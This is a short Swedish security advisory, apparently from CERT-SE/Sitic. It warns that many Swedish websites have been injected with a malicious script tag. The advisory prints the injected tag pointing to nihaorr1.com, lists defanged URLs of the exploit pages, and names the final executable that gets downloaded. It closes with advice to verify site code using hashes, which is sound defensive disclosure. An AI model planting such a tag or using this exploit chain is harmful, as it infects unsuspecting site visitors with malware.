![[CERT-SE]](/static/img/cert-se.svg)
![[MSB]](/static/img/msb.svg)
Uppdaterad | Publicerad
Flertalet svenska hemsidor infekterade
Ett stort antal svenska hemsidor har de senaste veckorna blivit infekterade med skadlig kod.
De senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna. Koden skickar i tysthet besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens
dator. Allt sker i bakgrunden så användaren ser inte att detta sker.
En sökning på Google ger snabbt svar på hemsidor som är eller har varit infekterade:
Koden som läggs till på hemsidan är: "<script src=http://www.nihaorr1.com/1.js>".
Efter att man hämtat hem "1.js" slussas klienten vidare till olika sidor som försöker infektera klienten:
hxxp://www.nihaorr1.com/cuteqq.htm
hxxp://www.nihaorr1.com/Ms07055.htm
hxxp://www.nihaorr1.com/Yahoo.php
hxxp://www.nihaorr1.com/cuteqq.htm
hxxp://www.nihaorr1.com/Ms07055.htm
hxxp://www.nihaorr1.com/Ms07033.htm
hxxp://www.nihaorr1.com/Ms07018.htm
hxxp://www.nihaorr1.com/Ms07004.htm
hxxp://www.nihaorr1.com/Ajax.htm
hxxp://www.nihaorr1.com/Ms06014.htm
Vid lyckad exploatering laddas "hxxp://www.nihaorr1.com/test.exe" ned och exekveras.
Webbservern som www.nihaorr1.com pekar på svarar i nuläget inte på HTTP-anrop på port 80. Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats. Det kan göras med hjälp av hash-funktioner som MD5 eller SHA1 alternativt att man jämför med koden i sitt "repository".